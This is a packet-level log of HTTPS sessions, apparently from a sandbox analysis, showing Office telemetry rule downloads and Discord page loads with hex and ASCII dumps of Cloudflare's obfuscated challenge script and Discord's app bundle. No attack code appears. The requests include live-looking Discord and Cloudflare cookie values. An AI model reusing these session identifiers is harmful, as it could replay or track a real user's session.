                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:47 UTC192OUTGET /rules/rule120653v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:48 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Date: Sat, 23 Nov 2024 20:12:48 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                    Content-Length: 419
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                                                                                                                                                                                                                                                                    ETag: "0x8DC582B9C710B28"
                                                                                                                                                                                                                                                                                    x-ms-request-id: c2dc1527-b01e-0053-5db2-3bcdf8000000
                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                    x-azure-ref: 20241123T201248Z-174c587ffdftv9hphC1TEBm29w000000039g00000000fznw
                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:48 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 49 69 5d 5b 4e 6e 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 54 74 5d 5b 45 65 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120653" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <SR T="2" R="([Ii][Nn][Nn][Oo][Tt][Ee][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    104192.168.2.549825162.159.137.2324437288C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:48 UTC707OUTGET /cdn-cgi/challenge-platform/h/g/scripts/jsd/e4025c85ea63/main.js? HTTP/1.1
                                                                                                                                                                                                                                                                                    Host: discord.com
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                    Cookie: __dcfduid=398fc180a9d711efaa23651edf07a944; __sdcfduid=398fc181a9d711efaa23651edf07a94443831d3c4767dd9386d009f37fd1539881ec275065364f4f19a9fcb7ecbe1072; __cfruid=7b90cdef04b10d79eeb745f3cdae90fc3fd17a2d-1732392732; _cfuvid=7bYx.Qayg1ZBezZbJidK.XxAv8tlou0EhnItAMmQdvI-1732392732068-0.0.1.1-604800000
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:48 UTC743INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Date: Sat, 23 Nov 2024 20:12:48 GMT
                                                                                                                                                                                                                                                                                    Content-Type: application/javascript; charset=UTF-8
                                                                                                                                                                                                                                                                                    Content-Length: 8076
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    cache-control: max-age=14400, stale-if-error=10800, stale-while-revalidate=10800, public
                                                                                                                                                                                                                                                                                    x-content-type-options: nosniff
                                                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bnlToRpg8X7Nrys4qvH4hqxJ3hyQPZxnXCu10%2BkwcJXLyZKIJE1EAXZS61qbPFa4uqE%2FVtLTBqHxAnKOZU0%2B4WEAOu8NHC58H0uiDEdJPKLc%2Feqicc0qsz46EToE"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                                                    CF-RAY: 8e73d0f19af87c99-EWR
                                                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:48 UTC626INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 3d 7b 63 46 50 57 76 3a 27 67 27 7d 3b 7e 66 75 6e 63 74 69 6f 6e 28 56 2c 68 2c 69 2c 6e 2c 6f 2c 79 2c 7a 2c 42 29 7b 56 3d 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 64 2c 55 2c 65 2c 66 29 7b 66 6f 72 28 55 3d 62 2c 65 3d 63 28 29 3b 21 21 5b 5d 3b 29 74 72 79 7b 69 66 28 66 3d 2d 70 61 72 73 65 49 6e 74 28 55 28 32 39 30 29 29 2f 31 2b 2d 70 61 72 73 65 49 6e 74 28 55 28 32 34 36 29 29 2f 32 2b 2d 70 61 72 73 65 49 6e 74 28 55 28 32 34 31 29 29 2f 33 2b 2d 70 61 72 73 65 49 6e 74 28 55 28 33 33 37 29 29 2f 34 2a 28 2d 70 61 72 73 65 49 6e 74 28 55 28 32 35 39 29 29 2f 35 29 2b 70 61 72 73 65 49 6e 74 28 55 28 32 38 33 29 29 2f 36 2a 28 70 61 72 73 65 49 6e 74 28 55 28 32 39 33 29 29 2f 37 29 2b 2d 70
                                                                                                                                                                                                                                                                                    Data Ascii: window._cf_chl_opt={cFPWv:'g'};~function(V,h,i,n,o,y,z,B){V=b,function(c,d,U,e,f){for(U=b,e=c();!![];)try{if(f=-parseInt(U(290))/1+-parseInt(U(246))/2+-parseInt(U(241))/3+-parseInt(U(337))/4*(-parseInt(U(259))/5)+parseInt(U(283))/6*(parseInt(U(293))/7)+-p
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:48 UTC1369INData Raw: 34 28 32 37 37 29 5d 26 26 28 49 3d 49 5b 61 34 28 33 30 30 29 5d 28 44 5b 61 34 28 33 33 31 29 5d 5b 61 34 28 32 37 37 29 5d 28 45 29 29 29 2c 49 3d 44 5b 61 34 28 32 36 30 29 5d 5b 61 34 28 32 36 35 29 5d 26 26 44 5b 61 34 28 32 33 34 29 5d 3f 44 5b 61 34 28 32 36 30 29 5d 5b 61 34 28 32 36 35 29 5d 28 6e 65 77 20 44 5b 28 61 34 28 32 33 34 29 29 5d 28 49 29 29 3a 66 75 6e 63 74 69 6f 6e 28 4f 2c 61 35 2c 50 29 7b 66 6f 72 28 61 35 3d 61 34 2c 4f 5b 61 35 28 33 33 35 29 5d 28 29 2c 50 3d 30 3b 50 3c 4f 5b 61 35 28 32 36 31 29 5d 3b 4f 5b 50 5d 3d 3d 3d 4f 5b 50 2b 31 5d 3f 4f 5b 61 35 28 32 38 38 29 5d 28 50 2b 31 2c 31 29 3a 50 2b 3d 31 29 3b 72 65 74 75 72 6e 20 4f 7d 28 49 29 2c 4a 3d 27 6e 41 73 41 61 41 62 27 2e 73 70 6c 69 74 28 27 41 27 29 2c 4a
                                                                                                                                                                                                                                                                                    Data Ascii: 4(277)]&&(I=I[a4(300)](D[a4(331)][a4(277)](E))),I=D[a4(260)][a4(265)]&&D[a4(234)]?D[a4(260)][a4(265)](new D[(a4(234))](I)):function(O,a5,P){for(a5=a4,O[a5(335)](),P=0;P<O[a5(261)];O[P]===O[P+1]?O[a5(288)](P+1,1):P+=1);return O}(I),J='nAsAaAb'.split('A'),J
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:48 UTC1369INData Raw: 4f 3d 30 29 3a 50 2b 2b 2c 47 2b 2b 29 3b 66 6f 72 28 54 3d 4a 5b 61 61 28 32 36 34 29 5d 28 30 29 2c 47 3d 30 3b 38 3e 47 3b 4f 3d 54 26 31 2e 32 38 7c 4f 3c 3c 31 2e 33 36 2c 50 3d 3d 45 2d 31 3f 28 50 3d 30 2c 4e 5b 61 61 28 32 36 32 29 5d 28 46 28 4f 29 29 2c 4f 3d 30 29 3a 50 2b 2b 2c 54 3e 3e 3d 31 2c 47 2b 2b 29 3b 7d 65 6c 73 65 7b 66 6f 72 28 54 3d 31 2c 47 3d 30 3b 47 3c 4d 3b 4f 3d 4f 3c 3c 31 7c 54 2c 45 2d 31 3d 3d 50 3f 28 50 3d 30 2c 4e 5b 61 61 28 32 36 32 29 5d 28 46 28 4f 29 29 2c 4f 3d 30 29 3a 50 2b 2b 2c 54 3d 30 2c 47 2b 2b 29 3b 66 6f 72 28 54 3d 4a 5b 61 61 28 32 36 34 29 5d 28 30 29 2c 47 3d 30 3b 31 36 3e 47 3b 4f 3d 31 2e 36 36 26 54 7c 4f 3c 3c 31 2e 35 2c 45 2d 31 3d 3d 50 3f 28 50 3d 30 2c 4e 5b 61 61 28 32 36 32 29 5d 28 46
                                                                                                                                                                                                                                                                                    Data Ascii: O=0):P++,G++);for(T=J[aa(264)](0),G=0;8>G;O=T&1.28|O<<1.36,P==E-1?(P=0,N[aa(262)](F(O)),O=0):P++,T>>=1,G++);}else{for(T=1,G=0;G<M;O=O<<1|T,E-1==P?(P=0,N[aa(262)](F(O)),O=0):P++,T=0,G++);for(T=J[aa(264)](0),G=0;16>G;O=1.66&T|O<<1.5,E-1==P?(P=0,N[aa(262)](F
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:48 UTC1369INData Raw: 3d 5b 5d 2c 48 3d 34 2c 49 3d 34 2c 4a 3d 33 2c 4b 3d 5b 5d 2c 4e 3d 46 28 30 29 2c 4f 3d 45 2c 50 3d 31 2c 4c 3d 30 3b 33 3e 4c 3b 47 5b 4c 5d 3d 4c 2c 4c 2b 3d 31 29 3b 66 6f 72 28 51 3d 30 2c 52 3d 4d 61 74 68 5b 61 64 28 32 35 30 29 5d 28 32 2c 32 29 2c 4d 3d 31 3b 4d 21 3d 52 3b 53 3d 4f 26 4e 2c 4f 3e 3e 3d 31 2c 4f 3d 3d 30 26 26 28 4f 3d 45 2c 4e 3d 46 28 50 2b 2b 29 29 2c 51 7c 3d 28 30 3c 53 3f 31 3a 30 29 2a 4d 2c 4d 3c 3c 3d 31 29 3b 73 77 69 74 63 68 28 51 29 7b 63 61 73 65 20 30 3a 66 6f 72 28 51 3d 30 2c 52 3d 4d 61 74 68 5b 61 64 28 32 35 30 29 5d 28 32 2c 38 29 2c 4d 3d 31 3b 52 21 3d 4d 3b 53 3d 4e 26 4f 2c 4f 3e 3e 3d 31 2c 30 3d 3d 4f 26 26 28 4f 3d 45 2c 4e 3d 46 28 50 2b 2b 29 29 2c 51 7c 3d 28 30 3c 53 3f 31 3a 30 29 2a 4d 2c 4d 3c
                                                                                                                                                                                                                                                                                    Data Ascii: =[],H=4,I=4,J=3,K=[],N=F(0),O=E,P=1,L=0;3>L;G[L]=L,L+=1);for(Q=0,R=Math[ad(250)](2,2),M=1;M!=R;S=O&N,O>>=1,O==0&&(O=E,N=F(P++)),Q|=(0<S?1:0)*M,M<<=1);switch(Q){case 0:for(Q=0,R=Math[ad(250)](2,8),M=1;R!=M;S=N&O,O>>=1,0==O&&(O=E,N=F(P++)),Q|=(0<S?1:0)*M,M<
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:48 UTC1369INData Raw: 31 27 2c 69 5b 61 37 28 33 33 34 29 5d 5b 61 37 28 32 34 30 29 5d 28 66 29 2c 44 3d 66 5b 61 37 28 32 36 33 29 5d 2c 45 3d 7b 7d 2c 45 3d 4f 62 64 45 6b 35 28 44 2c 44 2c 27 27 2c 45 29 2c 45 3d 4f 62 64 45 6b 35 28 44 2c 44 5b 61 37 28 32 39 37 29 5d 7c 7c 44 5b 61 37 28 32 38 30 29 5d 2c 27 6e 2e 27 2c 45 29 2c 45 3d 4f 62 64 45 6b 35 28 44 2c 66 5b 61 37 28 33 33 32 29 5d 2c 27 64 2e 27 2c 45 29 2c 69 5b 61 37 28 33 33 34 29 5d 5b 61 37 28 32 39 38 29 5d 28 66 29 2c 46 3d 7b 7d 2c 46 2e 72 3d 45 2c 46 2e 65 3d 6e 75 6c 6c 2c 46 7d 63 61 74 63 68 28 48 29 7b 72 65 74 75 72 6e 20 47 3d 7b 7d 2c 47 2e 72 3d 7b 7d 2c 47 2e 65 3d 48 2c 47 7d 7d 66 75 6e 63 74 69 6f 6e 20 76 28 65 2c 44 2c 45 2c 61 31 2c 46 29 7b 61 31 3d 56 3b 74 72 79 7b 72 65 74 75 72 6e
                                                                                                                                                                                                                                                                                    Data Ascii: 1',i[a7(334)][a7(240)](f),D=f[a7(263)],E={},E=ObdEk5(D,D,'',E),E=ObdEk5(D,D[a7(297)]||D[a7(280)],'n.',E),E=ObdEk5(D,f[a7(332)],'d.',E),i[a7(334)][a7(298)](f),F={},F.r=E,F.e=null,F}catch(H){return G={},G.r={},G.e=H,G}}function v(e,D,E,a1,F){a1=V;try{return
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:48 UTC1369INData Raw: 29 2c 63 3d 4f 62 6a 65 63 74 5b 61 32 28 32 34 37 29 5d 28 63 29 29 3b 72 65 74 75 72 6e 20 64 7d 66 75 6e 63 74 69 6f 6e 20 73 28 63 2c 64 2c 61 30 29 7b 72 65 74 75 72 6e 20 61 30 3d 56 2c 64 20 69 6e 73 74 61 6e 63 65 6f 66 20 63 5b 61 30 28 33 31 31 29 5d 26 26 30 3c 63 5b 61 30 28 33 31 31 29 5d 5b 61 30 28 32 36 39 29 5d 5b 61 30 28 33 32 33 29 5d 5b 61 30 28 33 31 34 29 5d 28 64 29 5b 61 30 28 32 37 30 29 5d 28 61 30 28 32 37 32 29 29 7d 66 75 6e 63 74 69 6f 6e 20 61 28 61 68 29 7b 72 65 74 75 72 6e 20 61 68 3d 27 73 74 72 69 6e 67 2c 5f 63 66 5f 63 68 6c 5f 6f 70 74 3b 61 4a 58 51 30 3b 50 75 55 73 35 3b 76 77 6e 4b 66 30 3b 5a 6f 41 59 4e 35 3b 53 72 73 6a 34 3b 79 64 57 73 36 3b 54 58 6b 62 30 3b 56 51 54 4c 75 32 3b 69 51 6d 66 77 31 3b 46 68
                                                                                                                                                                                                                                                                                    Data Ascii: ),c=Object[a2(247)](c));return d}function s(c,d,a0){return a0=V,d instanceof c[a0(311)]&&0<c[a0(311)][a0(269)][a0(323)][a0(314)](d)[a0(270)](a0(272))}function a(ah){return ah='string,_cf_chl_opt;aJXQ0;PuUs5;vwnKf0;ZoAYN5;Srsj4;ydWs6;TXkb0;VQTLu2;iQmfw1;Fh
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:48 UTC605INData Raw: 73 2c 63 68 61 72 41 74 2c 31 31 37 35 36 39 39 4a 4b 75 59 63 4d 2c 4f 62 64 45 6b 35 2c 63 68 6c 41 70 69 41 43 43 48 2c 62 69 6e 64 2c 63 6c 69 65 6e 74 49 6e 66 6f 72 6d 61 74 69 6f 6e 2c 72 65 6d 6f 76 65 43 68 69 6c 64 2c 75 6e 64 65 66 69 6e 65 64 2c 63 6f 6e 63 61 74 2c 6e 75 6d 62 65 72 2c 69 66 72 61 6d 65 2c 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 2c 62 6f 6f 6c 65 61 6e 2c 73 65 6e 64 2c 63 68 6c 41 70 69 53 69 74 65 6b 65 79 2c 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 2c 72 65 61 64 79 53 74 61 74 65 2c 2f 69 6e 76 69 73 69 62 6c 65 2f 6a 73 64 2c 63 68 63 74 78 2c 46 75 6e 63 74 69 6f 6e 2c 6f 6e 72 65 61 64 79 73 74 61 74 65 63 68 61 6e 67 65 2c 6e 6f 77 2c 63 61 6c 6c 2c 31 31 37 30 35 31 33 39 66 67 66 72 7a 65 27 2e 73 70 6c 69 74 28 27 2c
                                                                                                                                                                                                                                                                                    Data Ascii: s,charAt,1175699JKuYcM,ObdEk5,chlApiACCH,bind,clientInformation,removeChild,undefined,concat,number,iframe,createElement,boolean,send,chlApiSitekey,display: none,readyState,/invisible/jsd,chctx,Function,onreadystatechange,now,call,11705139fgfrze'.split(',


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    105192.168.2.549827162.159.137.2324437288C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:48 UTC862OUTGET /assets/822c37e354b4a39dd6ca.js HTTP/1.1
                                                                                                                                                                                                                                                                                    Host: discord.com
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                    Referer: https://discord.com/invite/BNXa5rYFXM
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                    Cookie: __dcfduid=398fc180a9d711efaa23651edf07a944; __sdcfduid=398fc181a9d711efaa23651edf07a94443831d3c4767dd9386d009f37fd1539881ec275065364f4f19a9fcb7ecbe1072; __cfruid=7b90cdef04b10d79eeb745f3cdae90fc3fd17a2d-1732392732; _cfuvid=7bYx.Qayg1ZBezZbJidK.XxAv8tlou0EhnItAMmQdvI-1732392732068-0.0.1.1-604800000
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:48 UTC964INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Date: Sat, 23 Nov 2024 20:12:48 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/javascript
                                                                                                                                                                                                                                                                                    Content-Length: 17689
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    CF-Ray: 8e73d0f4db4441ad-EWR
                                                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: https://discord.com
                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=2592000
                                                                                                                                                                                                                                                                                    ETag: "14e84006f1aa9308539c8042de09b598"
                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 22 Oct 2024 20:12:28 GMT
                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                    Vary: Origin
                                                                                                                                                                                                                                                                                    Permissions-Policy: interest-cohort=()
                                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                    X-Frame-Options: DENY
                                                                                                                                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qJoaOVdKKcSfVooE9J1iZ8kQjVWcXux9FX8s%2FNrRGzPiWyCXuekqLkOg7ZUVCoK5bltfd4KILu7wO%2F3HHEHO31UW7Bxv2IXZ%2B5nqlmLWZTj3M7lVp%2BMEsIuRNJa4"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:48 UTC405INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 3d 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 31 31 32 36 30 22 5d 2c 7b 32 36 32 33 30 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 65 78 70 6f 72 74 73 3d 22 2f 61 73 73 65 74 73 2f 61 66 64 34 34 61 65 30 35 31 32 36 62 35 66 61 62 34 30 64 2e 73 76 67 22 7d 2c 39 33 35 32 32 37 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 65 78 70 6f 72 74 73 3d 22 2f 61 73 73 65 74 73 2f 35 30 62 39 36 36 30 31 31 37 31 66 64 33 36 31 31 30 31 63 2e 73 76 67 22 7d 2c 34 37 39 34 39 35 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 6e 28 37 35 37 31 34 33 29
                                                                                                                                                                                                                                                                                    Data Ascii: "use strict";(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["11260"],{26230:function(e){e.exports="/assets/afd44ae05126b5fab40d.svg"},935227:function(e){e.exports="/assets/50b96601171fd361101c.svg"},479495:function(e,t,n){n(757143)
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:48 UTC1369INData Raw: 28 31 32 34 38 36 30 29 2c 78 3d 6e 28 31 30 38 34 32 37 29 2c 43 3d 6e 28 33 31 34 38 39 37 29 2c 76 3d 6e 28 35 38 35 34 38 33 29 2c 4e 3d 6e 28 39 38 31 36 33 31 29 2c 6a 3d 6e 28 33 38 38 30 33 32 29 2c 79 3d 6e 28 31 31 33 32 30 37 29 3b 66 75 6e 63 74 69 6f 6e 20 45 28 65 2c 74 2c 6e 29 7b 72 65 74 75 72 6e 20 74 20 69 6e 20 65 3f 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 74 2c 7b 76 61 6c 75 65 3a 6e 2c 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 2c 77 72 69 74 61 62 6c 65 3a 21 30 7d 29 3a 65 5b 74 5d 3d 6e 2c 65 7d 75 2e 5a 50 2e 69 6e 69 74 69 61 6c 69 7a 65 28 29 3b 63 6c 61 73 73 20 6b 20 65 78 74 65 6e 64 73 28 73 3d 69 2e 50 75 72 65 43 6f 6d 70 6f 6e 65 6e 74 29 7b 63
                                                                                                                                                                                                                                                                                    Data Ascii: (124860),x=n(108427),C=n(314897),v=n(585483),N=n(981631),j=n(388032),y=n(113207);function E(e,t,n){return t in e?Object.defineProperty(e,t,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[t]=n,e}u.ZP.initialize();class k extends(s=i.PureComponent){c
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:48 UTC1369INData Raw: 74 63 68 28 7b 74 79 70 65 3a 22 4c 4f 47 49 4e 5f 52 45 53 45 54 22 7d 29 7d 2c 77 69 64 74 68 3a 34 38 30 7d 29 7d 29 7d 72 65 6e 64 65 72 53 75 63 63 65 65 64 65 64 28 29 7b 72 65 74 75 72 6e 28 30 2c 72 2e 6a 73 78 73 29 28 6d 2e 5a 50 2c 7b 63 68 69 6c 64 72 65 6e 3a 5b 28 30 2c 72 2e 6a 73 78 29 28 22 69 6d 67 22 2c 7b 61 6c 74 3a 22 22 2c 73 72 63 3a 6e 28 32 36 32 33 30 29 2c 63 6c 61 73 73 4e 61 6d 65 3a 6c 28 29 28 79 2e 6d 61 72 67 69 6e 42 6f 74 74 6f 6d 32 30 2c 63 2e 74 71 3f 79 2e 6d 61 72 67 69 6e 54 6f 70 32 30 3a 22 22 29 7d 29 2c 28 30 2c 72 2e 6a 73 78 29 28 6d 2e 44 78 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 79 2e 6d 61 72 67 69 6e 42 6f 74 74 6f 6d 34 30 2c 63 68 69 6c 64 72 65 6e 3a 6a 2e 69 6e 74 6c 2e 73 74 72 69 6e 67 28 6a 2e 74 2e
                                                                                                                                                                                                                                                                                    Data Ascii: tch({type:"LOGIN_RESET"})},width:480})})}renderSucceeded(){return(0,r.jsxs)(m.ZP,{children:[(0,r.jsx)("img",{alt:"",src:n(26230),className:l()(y.marginBottom20,c.tq?y.marginTop20:"")}),(0,r.jsx)(m.Dx,{className:y.marginBottom40,children:j.intl.string(j.t.
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:48 UTC1369INData Raw: 69 73 2e 73 74 61 74 65 3b 69 66 28 30 3d 3d 3d 6c 2e 6c 65 6e 67 74 68 29 72 65 74 75 72 6e 20 64 2e 5a 2e 64 69 73 70 61 74 63 68 28 7b 74 79 70 65 3a 22 4c 4f 47 49 4e 5f 52 45 53 45 54 22 7d 29 2c 50 72 6f 6d 69 73 65 2e 72 65 6a 65 63 74 28 29 3b 6c 65 74 20 61 3d 69 3b 72 65 74 75 72 6e 28 6e 75 6c 6c 21 3d 6e 26 26 28 61 3d 28 30 2c 70 2e 5a 29 28 6e 29 29 2c 6e 75 6c 6c 3d 3d 61 29 3f 28 64 2e 5a 2e 64 69 73 70 61 74 63 68 28 7b 74 79 70 65 3a 22 4c 4f 47 49 4e 5f 52 45 53 45 54 22 7d 29 2c 50 72 6f 6d 69 73 65 2e 72 65 6a 65 63 74 28 29 29 3a 68 2e 5a 2e 72 65 73 65 74 50 61 73 73 77 6f 72 64 4d 46 41 76 32 28 7b 6d 65 74 68 6f 64 3a 65 2c 63 6f 64 65 3a 74 2c 74 69 63 6b 65 74 3a 73 2c 70 61 73 73 77 6f 72 64 3a 6c 2c 74 6f 6b 65 6e 3a 61 2c 73
                                                                                                                                                                                                                                                                                    Data Ascii: is.state;if(0===l.length)return d.Z.dispatch({type:"LOGIN_RESET"}),Promise.reject();let a=i;return(null!=n&&(a=(0,p.Z)(n)),null==a)?(d.Z.dispatch({type:"LOGIN_RESET"}),Promise.reject()):h.Z.resetPasswordMFAv2({method:e,code:t,ticket:s,password:l,token:a,s
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:48 UTC1369INData Raw: 75 2e 63 6a 29 28 5b 43 2e 64 65 66 61 75 6c 74 5d 2c 28 29 3d 3e 28 7b 6c 6f 67 69 6e 53 74 61 74 75 73 3a 43 2e 64 65 66 61 75 6c 74 2e 67 65 74 4c 6f 67 69 6e 53 74 61 74 75 73 28 29 2c 6d 66 61 54 69 63 6b 65 74 3a 43 2e 64 65 66 61 75 6c 74 2e 67 65 74 4d 46 41 54 69 63 6b 65 74 28 29 2c 65 72 72 6f 72 73 3a 43 2e 64 65 66 61 75 6c 74 2e 67 65 74 45 72 72 6f 72 73 28 29 2c 6d 66 61 4d 65 74 68 6f 64 73 3a 43 2e 64 65 66 61 75 6c 74 2e 67 65 74 4d 46 41 4d 65 74 68 6f 64 73 28 29 7d 29 29 3b 72 65 74 75 72 6e 28 30 2c 72 2e 6a 73 78 29 28 6b 2c 7b 2e 2e 2e 65 2c 2e 2e 2e 74 7d 29 7d 7d 2c 31 32 39 32 39 33 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 6e 2e 64 28 74 2c 7b 5a 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 72 7d 7d 29 3b
